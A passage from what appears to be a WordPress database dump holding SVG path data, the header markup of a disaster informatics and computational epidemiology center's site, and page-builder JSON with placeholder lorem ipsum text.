d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n        <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n        <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n        <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n        <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n        <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n        <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n        <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n        <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n        <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n        <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n        <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n        <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n        <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n        <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n        <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n        <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n        <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n        <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n        <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n        <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n        <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n        <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n        <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n        <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n        <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n        <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n            <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:40:57','2022-02-16 15:40:57','',22,'https://gsudice.dataconn.net/?p=290',0,'revision','',0),(294,1,'2022-02-16 15:41:15','2022-02-16 15:41:15','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna 